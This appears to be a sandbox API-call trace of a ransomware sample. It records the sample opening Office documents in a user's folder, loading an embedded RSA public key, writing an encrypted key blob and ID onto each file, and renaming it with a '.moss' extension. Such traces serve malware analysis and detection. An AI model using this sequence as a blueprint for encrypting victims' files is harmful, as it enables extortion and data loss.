RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.396] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Z91WTiE9.odt") returned=".odt" [0170.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Z91WTiE9.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\z91wtie9.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.397] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=90308) returned 1 [0170.397] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.400] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1609e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.400] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.401] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x160c4, lpOverlapped=0x0) returned 1 [0170.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.402] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.404] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.404] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.404] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.404] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.404] GetLastError () returned 0x0 [0170.404] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.404] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.404] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.404] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.404] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.404] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.405] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.405] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x160c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.406] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.406] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.406] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.406] CloseHandle (hObject=0x664) returned 1 [0170.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.408] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.408] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Z91WTiE9.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\z91wtie9.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\Z91WTiE9.odt.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\z91wtie9.odt.moss")) returned 1 [0170.410] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51ed9480, ftCreationTime.dwHighDateTime=0x1d5db0d, ftLastAccessTime.dwLowDateTime=0xb3065130, ftLastAccessTime.dwHighDateTime=0x1d5e4ef, ftLastWriteTime.dwLowDateTime=0xb3065130, ftLastWriteTime.dwHighDateTime=0x1d5e4ef, nFileSizeHigh=0x0, nFileSizeLow=0x58c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZpJC_.pptx", cAlternateFileName="ZPJC_~1.PPT")) returned 1 [0170.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.410] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.410] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZpJC_.pptx") returned=".pptx" [0170.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZpJC_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zpjc_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.410] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=22728) returned 1 [0170.410] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.414] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x58a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.414] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.415] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x58c8, lpOverlapped=0x0) returned 1 [0170.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.415] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.415] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.416] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.416] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.416] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.416] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.417] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.417] GetLastError () returned 0x0 [0170.417] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.417] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.417] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.417] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.417] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.417] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.417] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.419] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x58c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.419] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.419] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.419] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.419] CloseHandle (hObject=0x664) returned 1 [0170.420] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0xd80bd8 [0170.420] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8a0) returned 0x3b4b098 [0170.420] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZpJC_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zpjc_.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZpJC_.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zpjc_.pptx.moss")) returned 1 [0170.422] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfd2b8a0, ftCreationTime.dwHighDateTime=0x1d5da9c, ftLastAccessTime.dwLowDateTime=0x98009a80, ftLastAccessTime.dwHighDateTime=0x1d5e71a, ftLastWriteTime.dwLowDateTime=0x98009a80, ftLastWriteTime.dwHighDateTime=0x1d5e71a, nFileSizeHigh=0x0, nFileSizeLow=0x4001, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZRKlkyH3Jmyg3Y7.pps", cAlternateFileName="ZRKLKY~1.PPS")) returned 1 [0170.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.422] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0170.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZRKlkyH3Jmyg3Y7.pps") returned=".pps" [0170.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZRKlkyH3Jmyg3Y7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zrklkyh3jmyg3y7.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.423] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=16385) returned 1 [0170.423] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.426] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3fdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.426] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.427] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.427] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x4001, lpOverlapped=0x0) returned 1 [0170.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.428] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.428] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.428] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e8c0) returned 1 [0170.429] CryptCreateHash (in: hProv=0xd2e8c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.429] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.429] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.429] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.429] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.429] GetLastError () returned 0x0 [0170.429] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.429] CryptReleaseContext (hProv=0xd2e8c0, dwFlags=0x0) returned 1 [0170.429] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.429] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.429] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.429] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.430] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.430] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.430] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4001, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.430] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.431] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.431] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.431] CloseHandle (hObject=0x664) returned 1 [0170.432] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.432] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b4b098 [0170.432] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZRKlkyH3Jmyg3Y7.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zrklkyh3jmyg3y7.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZRKlkyH3Jmyg3Y7.pps.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zrklkyh3jmyg3y7.pps.moss")) returned 1 [0170.434] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f35e6c0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x4cee7030, ftLastAccessTime.dwHighDateTime=0x1d5dab8, ftLastWriteTime.dwLowDateTime=0x4cee7030, ftLastWriteTime.dwHighDateTime=0x1d5dab8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSqKO4y-pgVGUfXDhW", cAlternateFileName="ZSQKO4~1")) returned 1 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b461d0 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e8c0 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e948 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0170.434] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ef20 [0170.434] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8f35e6c0, ftCreationTime.dwHighDateTime=0x1d5de97, ftLastAccessTime.dwLowDateTime=0x4cee7030, ftLastAccessTime.dwHighDateTime=0x1d5dab8, ftLastWriteTime.dwLowDateTime=0x4cee7030, ftLastWriteTime.dwHighDateTime=0x1d5dab8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZSqKO4y-pgVGUfXDhW", cAlternateFileName="ZSQKO4~1")) returned 0 